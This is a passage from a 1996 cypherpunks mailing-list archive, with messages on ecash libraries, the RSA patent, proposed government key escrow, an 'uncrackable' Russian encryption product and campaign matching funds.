o Make the function names more parallel: currently, some are like
   ``wallet_open'' and some are like ``free_msg'' (we're talking about
   verb-object order, here).  This isn't a big deal, especially if you
   have lucre.h in front of you.

o Put in better differentiation of error conditions, and more logging.

o More complete client-to-client communications.  Right now it is limited
   to payment requests and payments.

We are, of course, open to suggestions [and ecash donations! :-) ].

You can reach us, the development team for -lucre, at either of the
addresses below (in fact, use both, as the nym servers seem to be flaky).
Better yet, there is a mailing list to discuss the library; send mail
to majordomo@c2.org with body "subscribe dev-lucre" to subscribe.

Type bits/keyID    Date       User ID
pub  1024/E9E2AC75 1996/06/13 Development team for -lucre <lucre@alpha.c2.org>
          Key fingerprint =  63 94 0D F7 D9 6F 2D E5  08 0F EE 19 CB 6B A9 17 
sig       E9E2AC75             Development team for -lucre <lucre@alpha.c2.org>
                              Development team for -lucre <lucre@nym.jpunix.com>
sig       E9E2AC75             Development team for -lucre <lucre@alpha.c2.org>


- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzHANI0AAAEEANYAvtkmYoH/Mav1A8fuwm+ZsDD4t3NY7nYd6zBKkepLLHWd
Ue1Wnyr3mFHcrQBbJshwOJOCCUvYwDHST1TOqssaK/vAVavvubD8kRam+SET04b/
477krJbCycnbBJ5FSugR4kKKs3S3BkrFWIJaBVTSzsocp+eGrrpcpsjp4qx1AAUR
tDBEZXZlbG9wbWVudCB0ZWFtIGZvciAtbHVjcmUgPGx1Y3JlQGFscGhhLmMyLm9y
Zz6JAJUDBRAxwDTfulymyOnirHUBAeqmBACfy2V57n/kAWMaUT5cFjW/C9ErL9JD
2ej5xr2vXNsYqXVIGGAc1ZNWIRKdxIp5fs+eBwf6mPRcwHe62a50hp9nTmhNnNCr
HLLr6g4KkIgNslYtIma+U7ojysAWrcU0Ng8dse8bheO6OiXPoBVI+stp9Uijl60f
tTOCPEP9ldY34LQyRGV2ZWxvcG1lbnQgdGVhbSBmb3IgLWx1Y3JlIDxsdWNyZUBu
eW0uanB1bml4LmNvbT6JAJUDBRAxxegrulymyOnirHUBAb+MBADErPAtQdo4X8UU
8uGrFsDvSIfzRVgaz+HarEB1PNW5gsEiw9xhHizT6cKM0L9F7BCJWye2jHDm8DSP
a5GdQNEmg+siFOw7+97hELqOzJsOjTBrF+mZ5flEeGQJHKub1D5hRChIqI/bwa5A
6e8AKbLB+mfaO2hfXJtnlroUx9foTg==
=GvP2
- -----END PGP PUBLIC KEY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMchcGbpcpsjp4qx1AQEVrQQArRPfJgQQq7rRgIl5mBoS5Ju2Hq4aR7u3
mV90yLTHpQq8mC59O2NCxtJzRqfnA9sASVWDZWFudwmzwj6V6f6Kwxb8i8PO4EZ0
28A+BBf+jtpDNG2bsTYxEbIxQM1eE+GuUjSatbW0sYW3J3df7YeYyQAVU/7b2dni
+BLOnD4tqvw=
=Jozg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 20 Jun 1996 10:15:40 +0800
To: iang@cs.berkeley.edu (Ian Goldberg)
Subject: Re: German Federal Bank opposes e-cash
In-Reply-To: <4q9cqs$ln7@abraham.cs.berkeley.edu>
Message-ID: <199606191849.OAA26090@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ian Goldberg writes:
> I don't get this worry about counterfeiting.  It would seem to be harder to
> counterfeit ecash than paper cash (though, admittedly, it would be harder to
> track, but it would almost certainly have to be an "inside job").  Maybe
> the journalists are just misinformed, or possibly the banking people?

I think that the fear is that counterfeit E-Cash is much easier to
pass and much more "perfect", though I think that with proper controls
the system is indeed more secure than paper currency.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Thu, 20 Jun 1996 13:46:47 +0800
To: Vin McLellan <vin@shore.net>
Subject: Re: "Mail Exploders"
In-Reply-To: <v02140b03adec9a570eca@[206.243.160.205]>
Message-ID: <Pine.SUN.3.94.960619152722.9011B-100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain


	Vin:

On Tue, 18 Jun 1996, Vin McLellan wrote:

> semi-moderated newsgroup) could be slapped for just bouncing the SPAM back
> at the sender.

	Cyberpromotions VS AOL is about AOL returning to CyberPromotions
	E-Mail for whom there was no user on AOL.
	
	CyberPromotions had a number of "User Unknown" addresses in
	its list, as as a consequence, they bounced back to the 
	sender.    And like most bounce messages, the majority of them
	wre for individual address.

	<< In effect, CyberPromotions mailbombed itself, by having
	so many invalid addresses, that their system was swamped, 
	when those messages came back.  << I suspect that people
 	that didn't like the e-mail also contributed to that. >> >>

	This was all discussed on Listmanager several months ago. 

> that the subscribers of AOL (or other online community) agreed -- in their
> intial subscriber contracts -- to have AOL refuse for them.

           I misplaced a procmail recipe that automatically
	   returns to sender any mail that the recipient is BCC'd.
	   Very usfull for those with shell accounts.  

> a chain of contracts that forbid it (without reference to content) from the
> backbone back through the IAPs to the users.  (I think Long-Morrow at Yale

	MCI has announced that any domain that originates spam
	that travels through their system is subject to being
	cut off of their system.   They appear to be following
	through with that policy.  

	Sprint doesn't care what travels through their system.  

        xan

        jonathon
        grafolog@netcom.com



	NETCOM --- when only the worst in internet service will suffice.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Thu, 20 Jun 1996 13:33:50 +0800
To: cypherpunks@toad.com
Subject: Re: German Federal Bank opposes e-cash
In-Reply-To: <m0uWKRm-0000B2C@ulf.mali.sub.org>
Message-ID: <v03007500adee319399c6@[198.93.25.98]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:19 -0700 19.6.96, Ian Goldberg wrote:

> Maybe the journalists are just misinformed, or possibly the banking
> people?

When I met with the head of payment systems for the German federal bank
late last year, he seemed pretty with it and knowledgable about the
relevant issues.

> That's very interesting, especially considering Deutsche Bank has signed
> on to be an ecash mint

At the risk of providing redundant information, the Deutsche Bank is a
commercial bank that has nothing to do with the Deutsche Bundesbank,
which is the central bank.

Personally, I don't think too much should be read into the
announcement. It contains no fundamentally new information and is
simply a public articulation of on otherwise obvious state of affairs.
(Or did anyone really think that the central banks weren't paying close
attention to these goings on?)

Stephan

________________________________________________________________________
Stephan Somogyi                Mr Gyroscope                Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 20 Jun 1996 13:32:01 +0800
To: "Paul S. Penrod" <furballs@netcom.com>
Subject: Re: Current status of RSA patent...
In-Reply-To: <Pine.3.89.9606191052.A14088-0100000@netcom6>
Message-ID: <199606191956.PAA17079@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Can anyone provide additional information on the RSA patent status? 
> If memory serves me, it is due to expire sometime in 1997. 

I think you need to replaces your SIMMs, your memory is faulty.  RSA
lives until 2000 (or 2003, I forget); 1997 is Diffie-Helman.

> Also, what are the ramifications of deploying software based around it, 
> such as PGP 2.62i (from UK)?

What you think would happen based on the fact that the patent hasn't
expired.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 20 Jun 1996 14:15:01 +0800
To: declan@well.com (Declan McCullagh)
Subject: Re: Digital Cash application
Message-ID: <199606192305.QAA16832@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:20 PM 6/19/96 -0500, Declan McCullagh wrote:
>Whether it's a good idea or not -

Don't bury your head in the sand too early.

>- and I'm told that it could violate FEC
>rules -

_ANYTHING_ could "violate FEC rules."  The issue is, "could this be done in 
a way that would NOT violate any such rules.  Or, more generally, could this 
be done in a way that would challenge or even obliterate FEC rules.  If you 
ask a lawyer for the course of action to take that will, guaranteed, not 
raise any eyebrows, he'll give you one speech.  If, on the other, you ask 
him if a tactic violates black-letter law, for certain, he'll give you another.

>- it's not going to happen.
>A campaign spokesperson told me that "Harry refuses" to take the cash, period.

(How certain are you that they understand the ramifications of this?)

This year, maybe not.  However that doesn't mean that there shouldn't be a 
debate on the subject.  Technology may allow a rip-roaring debate among the 
public, not just the Libertarian Party, and e-cash may implement this 
stolen-property return in a way designed to cause the most consternation and 
embarrassment among those in power.

Remember, if it has been decided, a year ago, that doing this was "okay", 
chances are good that Harry Browne WOULD be willing to do so now.  Trying to 
ignore the issue won't make it go away.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Thu, 20 Jun 1996 11:57:35 +0800
To: cypherpunks@toad.com
Subject: Dutch smartcard alert: De Waag, Amsterdam, 6/19 1900 hrs
Message-ID: <v02140b09adee262aa88c@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Any C'punks and/or interested parties who happen to be in Amsterdam might
want to pay a visit to De Waag this Friday night, ~7pm: AFAIK, the
Chipknip--the electronic cash system tested in Arnhem--is making its public
debut in the restaurant/cafe "In De Waag." It looks like a bad standard,
imo: smartcards storing x<fl50, PIN-card dependent ( -> True Name),
transaction records kept (duration unknown) by the implementing company,
Interpay. If you're interested in the standard ("VIC"?), get in touch with
Interpay: they _have_ released the payment boxes (real cute: an LCD screen,
a green "ja" button and a yellow "?" button), and I've seen a Rabobank
wallet-reader. For now, the cards stay in De Waag. Full rollout should be
about the end of this year.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Thu, 20 Jun 1996 15:22:21 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199606200029.RAA20928@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


FYI: "Cash Crunch" _Wall Street Journal_ by Neal Templin 6/17/96

     "Companies are coming up with ways to deal with one of the biggest obstacles to on-line purchases: how to pay for what you buy"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 20 Jun 1996 14:30:25 +0800
To: reagle@MIT.EDU (Joseph M. Reagle Jr.)
Subject: Re: Safemail
In-Reply-To: <9606191626.AA24637@rpcp.mit.edu>
Message-ID: <199606192352.SAA10970@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Joseph M. Reagle Jr. wrote:
> 
> At 04:19 PM 6/18/96 -0400, you wrote:
> 
> >        SafeMail uses a proprietary Russian algorithm.
> 
>         Maybe it is GOST. Schneir covers it, and there is a white paper on
> it at the b_crypt site.

But GOST isn't based on public key cryptography, it is a symmetric
algorithm, right?

And these guys claim that they use PK cryptography.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 20 Jun 1996 14:31:29 +0800
To: se7en <se7en@dis.org>
Subject: Re: MasterCard Seeks Revision in On-Line Bill
In-Reply-To: <Pine.BSI.3.91.960619122424.3783D-100000@kizmiaz.dis.org>
Message-ID: <Pine.SUN.3.93.960619193424.444A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 19 Jun 1996, se7en wrote:

> 
> 
> A MasterCard International official told a congressional committee 
> Wednesday that encryption technology is "vital to the development and 
> security" of a number of its products, including its smart card program.
> 
> Joel Lisker, MasterCard International senior vice president for security 
> and risk management, testified in support of the "Promotion of Commerce 
> On-Line an the Digital Era Act" bill.


Hmm.  Mr. Lisker is a friend of mine.  I think I'll give him a call.


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 20 Jun 1996 16:25:29 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Gov. archives - NSA (fwd)
Message-ID: <Pine.SUN.3.93.960619194214.444C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain




New ideas about where the "totally new russian crypto" proffered by
"mailsafe" might come from:

---------- Forwarded message ----------
Date: Tue, 04 Jun 1996 12:13:22 -0500
From: Brian Durham <bdurham@metronet.com>
To: cypherpunks@toad.com
Subject: Re: Gov. archives - NSA

http://www.nsa.gov:8080/

Interesting information about Soviet one-time pad ciphers and about 
crypto-related documents from the WW2 era that are being declassified.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 20 Jun 1996 16:55:54 +0800
To: se7en <cypherpunks@toad.com
Subject: Re: MasterCard Seeks Revision in On-Line Bill
Message-ID: <199606200301.UAA00392@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


This kind of testimony shows exactly why we (individual citizens) can't 
trust corporations to guard our interests in the crypto arena:


At 12:25 PM 6/19/96 -0700, se7en wrote:
>Joel Lisker, MasterCard International senior vice president for security 
>and risk management, testified in support of the "Promotion of Commerce 
>On-Line an the Digital Era Act" bill.
>
>But he urged that the legislation be amended to address security concerns 
>arising from the resale and reexportation of encryption technology.
>
[..]
>But Mr. Lisker urged that the bill be amended to increase the penalties 
>for the rexportation and resale of this technology to questionable 
>buyers, including criminals. "Modernizing the federal regulatory approach 
>to encryption technology must be accomplished without weakening the 
>ability of law enforcement agencies to pursue criminal activity," he 
>testified.

Look at this closely, and Mastercard's position, and you'll notice that 
Lisker has no obvious professional interest in encouraging the _increasing_ 
of penalities for the "reexportation and resale of this technology to 
questionable buyers, including criminals."  (In a contest between Mastercard 
armed with good encryption, and criminals armed with similar tools, 
Mastercard will win, because winning simply involves keeping the crooks away 
from its money.)  Lisker is also presumably smart enough to know that few 
people are going to go into an "Encryption Store" and say, "I'm a criminal!  
Could I buy your best encryption, please?"    

Yet, despite no obvious reason for Lisker's interest, he's pushing the "no 
crypto to bad guys" buttons, so he's obviously sucking up to the politicians 
in an area he has no reason to.  It sounds to me like a deal is being 
struck, and I'm certain the public will be on the short end of that deal.

Why can these thugs just accept the fact that crypto will get into the hands 
of people that governments don't want it to?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 20 Jun 1996 18:18:02 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: Digital Cash application
Message-ID: <199606200312.UAA01155@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:53 PM 6/19/96 -0400, Declan B. McCullagh wrote:
>Excerpts from internet.cypherpunks: 19-Jun-96 Re: Digital Cash
>application by jim bell@pacifier.com 
>> It seems to me that since paying people funds that were stolen from them 
>> would produce good publicity, which by definition could be argued to be 
>> spending it on the campaign.  Sure, it's a non-traditional tactic, but that 
>> doesn't mean it's in violation of the campaign law.  They could also email 
>> along a set of libertarian literature, and the recipient would certify that 
>> he would promote the libertarian cause and work for the election of the 
>> candidate, etc, etc.
>
>Jim: I've worked on a presidential campaign before and can tell you that
>if the FEC is likely to consider something a violation, the campaign is
>not going to skirt the line.
>
>That said, perhaps the law is outdated and needs to be changed.


The following two paragraphs were sent to me by a person familiar with 
Oregon Libertarian politics over the last 15 years:


"Good idea.  Something like this was done in the early '80's in Oregon.
There was a $1 checkoff to the political party of one's choice on the
Oregon income tax form, and the LPO was the recipient of a grand or so of
money stolen from taxpayers.  Gary Chipman came up with the idea of
sending $1 bills to LPO members and registered Oregon libertarians with a
fundraising letter touting us as the only party that would really give
them their money back."

"Interestingly, the mailing raised more in donations than it cost in stolen
money and postage, and got us good press too.  The legislature promptly
abolished the checkoff during their next session."

[end of quote]

There may be a CLUE here:  Laws and regulations tend to be written based on 
what the writer can imagine, and are updated based on what has happened.  We 
can probably agree that "standard" (non-libertarian) politics would not have 
anticipated such an idea, and moreover you can also suppose that 20+ years 
of D's and R's politics would not have resulted in an example of such a 
tactic being used.  Thus, there is no obvious reason to believe that this 
kind of tactic would have already been prohibited.

We can agree that D's and R's won't like it, as is obvious from what the 
Oregon legislature did, but rather than merely presume that it is illegal, 
why not take the position that unless it is clearly outlawed, then it must 
be considered a legal tactic?  It would be a valid goal to eliminate the 
system, as it apparently did in Oregon.  Don't give up before the race.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@ARC.unm.EDU>
Date: Thu, 20 Jun 1996 18:36:06 +0800
To: safemail@ntrnet.net
Subject: Anything is Possible
Message-ID: <1.5.4.16.19960620032806.3b7f4ab8@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 17 Jun 96 at 17:21, "M.Wagoner" (safemail@ntrnet.net) wrote:

> We would like someone to be able or should I say try and crack our
> encryption. IT IS IMPOSSIBLE.

Mmm hmm. Sure. And the Titanic was unsinkable, except for that
damned iceberg. And does anyone remember the great train robbery
of Britain? I could go on forever. There are no absolutes,
especially in cryptography. I would be willing to bet that the 
Safe Mail execs encrypt their company mail with PGP. Maybe some
day, in my spare five minutes, I'll crack it - but I'll have
to be really damn bored. And why would I bother - you've already
proven its fault.

===============================================================================
David Rosoff (nihongo o chiisaku dekimasu)  ------------->  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu or get from keyservers
pub  1024/D37692F9 1995/07/01 David Rosoff <drosoff@arc.unm.edu>
          Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
I accept anonymous mail. If I didn't sign it, you don't know I wrote it.
===
"Made weak by time and fate, but strong in will / To strive, to seek, to find--
and not to yield." <---- "Ulysses", by Alfred, Lord Tennyson

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcjB7RguzHDTdpL5AQFW1AP/T2a2v2PSL2yMKsMZUtsSptCUZ1+peQ2y
Wuk0dB+qyUU+of2dDv1XR/P+SQ5Q5YsOPOtZSocZIF2cKDuDG5sLreHoCDwlApZD
CFHQd1RtrTPFq4btd5QGK6w0gGcR/vkrfk8x1yZd+1UfPIrOUKRBXcnDUZqwWKFu
qCOuvCkGNmY=
=+98t
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 20 Jun 1996 18:33:06 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Federal key registration agency
In-Reply-To: <v02120d59aded35019abf@[192.0.2.1]>
Message-ID: <199606200248.VAA26690@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Lucky Green wrote:
> At 16:27 6/18/96, TM Peters wrote:
> >Speaking to the Commonwealth Club of California in San Francisco, Reno said
> >her plan would require people to register with the new agency the secret
> >codes -- or "keys" -- they use to encrypt messages online.
> 
> The cat is out of the bag. Janet Reno is calling for mandatory Government
> Access to Keys. Not that her statement would surprise anyone on this list.
> Still, I believe the administration has never before publicly stated that
> people will be _required_ to deposit their encryption keys with the
> government. I wonder what the penalties for failure to comply with this
> requirement will be.
> 

A couple of questions [admittedly, I am not the best expect in American
politics]: 

1) Is there anything real that individual citizens can do?
2) Would it be helpful to kick democrats out of office and replace
them with republicans? In other words, are republicans any better
than democrats in respecting citizens' right to protecting their
privacy from the government?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 20 Jun 1996 16:48:53 +0800
To: jimbell@pacifier.com>
Subject: Re: Digital Cash application
In-Reply-To: <199606191813.LAA27918@mail.pacifier.com>
Message-ID: <Qlm=og_00YUyEZadge@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 19-Jun-96 Re: Digital Cash
application by jim bell@pacifier.com 
> It seems to me that since paying people funds that were stolen from them 
> would produce good publicity, which by definition could be argued to be 
> spending it on the campaign.  Sure, it's a non-traditional tactic, but that 
> doesn't mean it's in violation of the campaign law.  They could also email 
> along a set of libertarian literature, and the recipient would certify that 
> he would promote the libertarian cause and work for the election of the 
> candidate, etc, etc.

Jim: I've worked on a presidential campaign before and can tell you that
if the FEC is likely to consider something a violation, the campaign is
not going to skirt the line.

That said, perhaps the law is outdated and needs to be changed. The
portion of the campaign finance law, as intepreted by the FEC, barring
online services from providing free accounts to political candidates, is
now being scrutinized in Congress. Rep. White will introduce a reform
bill in about two weeks.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 20 Jun 1996 19:15:15 +0800
To: "Joseph M. Reagle Jr." <markm@voicenet.com>
Subject: Re: Does information want to be free?
Message-ID: <199606200731.AAA26703@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:26 PM 6/16/96 -0400, Joseph M. Reagle Jr. wrote:
>        If someone found out all the medical information of cypherpunks list
> members and distributed about the Net, how would people feel? 

It would worry me far less than the fact that my medical records are
accessible to the government.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tonie@efn.org (Tonie Nathan)
Date: Thu, 20 Jun 1996 21:25:51 +0800
To: declan@well.com (Declan McCullagh)
Subject: Take the money, Harry.
Message-ID: <199606200831.BAA16798@haus.efn.org>
MIME-Version: 1.0
Content-Type: text/plain


>  Jim, 
Harry should take the money.  As Ayn Rand said, "Don't let your morality be
used against you."

   I believe in the philosophy of law.  As long as it's legal, each person
can take whatever he is legally entitled to from the government's stolen
money, as long as he/she doesn't ADVOCATE that the coercive tax system be
retained.   Many will not take grants, or welfare, but they are legally
entitled to it.  As for the moral entitlement, that is a matter for them to
work out for themselves. After all, we have to drive on government (tax
supported) roads, etc.

Tonie





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tonie@efn.org (Tonie Nathan)
Date: Thu, 20 Jun 1996 19:50:30 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Matching funds
Message-ID: <199606200837.BAA17016@haus.efn.org>
MIME-Version: 1.0
Content-Type: text/plain


In 1996, the Libertarian Party will apparently qualify for Federal matching
>>>funds for its Presidential political campaign.  That does not mean that it
>>>will _accept_ them, being stolen goods.  However, a few years ago I heard of
>>>an idea that they should accept the money, and return it to the people, a
>>>small amount at a time, to whomever asks for it.  Besides returning the
>>>stolen money to its rightful owners, that would produce substantial positive
>>>publicity for the Libertarian party, embarrassment for the Democrats and
>>>Republicans, while at the same time reducing the amount of money available
>>>for the D's and the R's.
>>>
>>>

You can buy a helluva lot more publicity with the matching funds.  I'm not
advocating this, just pointing it out.

Tonie





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 20 Jun 1996 18:16:42 +0800
To: "Paul S. Penrod" <furballs@netcom.com>
Subject: Re: Current status of RSA patent...
Message-ID: <199606200543.BAA29268@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 19 Jun 96 at 13:25, Paul S. Penrod wrote:

> PGP 2.6.2i is not US codebase, and RSA is not patented outside the US 
> according to Bruce Schneiner. Therefore, if a product was deployed into 

Note that Bruce's expertise is in cryptography, not patent law.

> the US using a non-US codebase, it is unclear to me what legal 
> jurisdiction (if any) RSA may have in these circumstances.

It's a violation of RSA's patent wherever RSA is patented (in the US 
only, I believe).  Doesn't matter who wrote the code, or where.

Oh yeah: PGP 2.6ui or 2.6.3i is based on US versions.  I believe they 
still use some of PRZ's code.

And don't forget that IDEA is patented by Ascom Tech AG.

Rob.


---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.org>
Date: Thu, 20 Jun 1996 20:07:52 +0800
To: ichudov@algerbra.com
Subject: Re: Federal Key Registration Agency
Message-ID: <Pine.SUN.3.91.960620014132.14548A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


On Wed, 19 Jun 1996, Igor Chudov wondered:
>Lucky Green wrote:
> At 16:27 6/18/96, TM Peters wrote:
> >Speaking to the Commonwealth Club of California in San Francisco, Reno said
> >her plan would require people to register with the new agency the secret
> >codes -- or "keys" -- they use to encrypt messages online.
> 
>: The cat is out of the bag. Janet Reno is calling for mandatory Government
>: Access to Keys. Not that her statement would surprise anyone on this list.
>: Still, I believe the administration has never before publicly stated that
>: people will be _required_ to deposit their encryption keys with the
>: government. I wonder what the penalties for failure to comply with this
>: requirement will be.
 

> A couple of questions [admittedly, I am not the best expect in American
> politics]: 

> 1) Is there anything real that individual citizens can do?

Keep your PGP262.zip disks in ziplock bags and cache them in the backyard,
forests,The golf courses.  Get a GPS location and escrow the locations with
with trusted friends using Secret Share.  Payout to Jim Bell's AP service.  
Move to Canada?

William Knowles
erehwon@c2.org
Finger for public key




 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMcke1AURbnwsNLz5AQHmMQQA2TFznKaMSM9uayXkvpcq/SsYg1hLnNKW
4v+NKSAVoDSGyn96VPxH1zEDP+dHk2MS173ocIUcaCm3VzRbBp6qnukAzTjGxjns
PVFFS5dsicx+wR4LFxWhUy/7fjvP6BUTLUwPvQGuXZyh8jof1uuL8FYXPtku6tSG
a78TvfAgknU=
=IZFJ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 20 Jun 1996 20:44:45 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Federal key registration agency
Message-ID: <199606200854.BAA06982@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:48 PM 6/19/96 -0500, ichudov@algebra.com (Igor Chudov) wrote:
>A couple of questions [admittedly, I am not the best expect in American
>politics]: 
>1) Is there anything real that individual citizens can do?
Agitate - it worked well when Clipper first came out.
Write code to do things regular people want to do, so that they'll
be trying to ban existing material instead of new material,
and so people will get used to using encryption.  PGP is nice, but
imagine if everyone who used Netscape had windows popping up that said
"Encrypting your message to $RECIPIENT.  Cc: to the FBI? [Yes] [No]"

>2) Would it be helpful to kick democrats out of office and replace
>them with republicans? In other words, are republicans any better
>than democrats in respecting citizens' right to protecting their
>privacy from the government?

Remember that the Clipper initiative and development started
during the Presidency of ex-CIA-director and all-around sleazemeister
George Bush.  You could say it was dumb luck that it came out
during Clinton's watch, so he got the credit/blame, but the folks who
are pushing it have the political savvy to know they'd have far less luck
with a lame-duck Bush proposal during a Clinton "Reinventing Government"
than by waiting until Clinton's securely in office, giving him some credit,
and having the Republicans who were around when it started supporting
them as well.  [Or they could have expected Bush to be re-elected,
and figured announcing it before the election wouldn't help.  Or the
product could have just been late :-)]

Not much difference; if anything, Democrats are usually more in favor
of free speech than Republicans, and would be more likely to oppose it.
They're both a pretty sad lot, though there are occasional Congresscritters
who sometimes get it.  Now, kicking out Democrats and Republicans and
replacing them with Libertarians, Perotistas, Greens, or even Reds would have
a positive effect, at least for a little while, but that's a bit more work. :-)


#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Thu, 20 Jun 1996 18:13:50 +0800
To: "Paul S. Penrod" <furballs@netcom.com>
Subject: Re: Current status of RSA patent...
Message-ID: <v02140b08adee89ac1f47@[206.243.161.221]>
MIME-Version: 1.0
Content-Type: text/plain


"Paul S. Penrod" <furballs@netcom.com> suggested:

>PGP 2.6.2i is not US codebase, and RSA is not patented outside the US
>according to Bruce Schneiner. Therefore, if a product was deployed into
>the US using a non-US codebase, it is unclear to me what legal
>jurisdiction (if any) RSA may have in these circumstances.

        The relevant issue is not the code-base.  Copyright "protects" the
code.  A patent is a proprietary claim on a design for a device, in this
case RSA's PKC.  A nation issues a patent as an acknowledgement and
validation of a proprietary claim on a specific design, for a non-obvious
device, for a limited period, enforcable within the boundries of its
jurisdiction.

        Nice try.

        2.6.X-ui doesn't use Rivest's RASREF cryptographic toolkit like the
US version does, but it does impliment the patented RSA "device."  You can
bring it into the US, but if you try to sell it in the US and make money
from the design --without giving RSA its due -- they're gonna get ya!

        RSA has no "legal jurisdiction,"  in the US or elsewhere.  (Few
companies do;-)  But I can understand how, hanging around a Libertarian
cabal like C'punks, you might forget that sovereignty rests in the State.
Wishful thinking, lad.

        Suerte,
                        _Vin

         Vin McLellan +The Privacy Guild+ <vin@shore.net>
      53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                         <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 20 Jun 1996 19:47:39 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Federal key registration agency
In-Reply-To: <199606200248.VAA26690@manifold.algebra.com>
